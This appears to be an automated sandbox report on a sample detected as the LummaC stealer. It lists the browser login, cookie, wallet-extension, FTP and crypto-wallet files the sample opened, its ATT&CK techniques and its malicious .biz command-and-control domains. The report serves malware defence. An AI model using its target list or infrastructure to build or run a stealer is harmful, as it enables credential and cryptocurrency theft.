Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2081424148.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2159575392.00000000019B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2081779151.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2080931138.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2106519599.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2132681260.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2156812212.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2159595354.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2132681260.0000000001961000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2156812212.000000000195D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2106519599.000000000195F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3944, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 3944, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	34 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	761 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	34 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.XPACK.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://atten-supporse.biz/p(	100%	Avira URL Cloud	malware
https://atten-supporse.biz/apiye;	100%	Avira URL Cloud	malware
https://atten-supporse.biz/8/	100%	Avira URL Cloud	malware
https://atten-supporse.biz/Cg3	100%	Avira URL Cloud	malware
https://atten-supporse.biz/(/	100%	Avira URL Cloud	malware
https://atten-supporse.biz/X/	100%	Avira URL Cloud	malware
https://atten-supporse.biz/api5	100%	Avira URL Cloud	malware
https://atten-supporse.biz/apiuG	100%	Avira URL Cloud	malware
http://crl.microsoftyo;	0%	Avira URL Cloud	safe
https://atten-supporse.biz/Uidlye;	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
atten-supporse.biz	104.21.80.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
dare-curbys.biz	false	high
impend-differ.biz	false	high
dwell-exclaim.biz	false	high
zinc-sneark.biz	false	high
formy-spill.biz	false	high
se-blurry.biz	false	high
covery-mover.biz	false	high
https://atten-supporse.biz/api	false	high
atten-supporse.biz	false	high
print-vexer.biz	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/p(	file.exe, 00000000.00000002.2237700583.0000000001961000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://atten-supporse.biz/apiuG	file.exe, 00000000.00000003.2156812212.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://atten-supporse.biz/apie	file.exe, 00000000.00000003.2235929559.0000000001941000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237383660.0000000001941000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/Cg3	file.exe, 00000000.00000003.2080931138.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081779151.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081424148.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106519599.0000000001999000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://atten-supporse.biz//	file.exe, 00000000.00000003.2106519599.000000000195F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/(/	file.exe, 00000000.00000003.2196862230.0000000001961000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apis	file.exe, 00000000.00000003.2235929559.0000000001941000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237383660.0000000001941000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.2135079342.0000000006173000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apim	file.exe, 00000000.00000003.2196862230.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237700583.0000000001961000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/Uidlye;	file.exe, 00000000.00000003.2233473496.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179552864.00000000019C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237946464.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183926336.00000000019BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196984088.00000000019C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	false		high
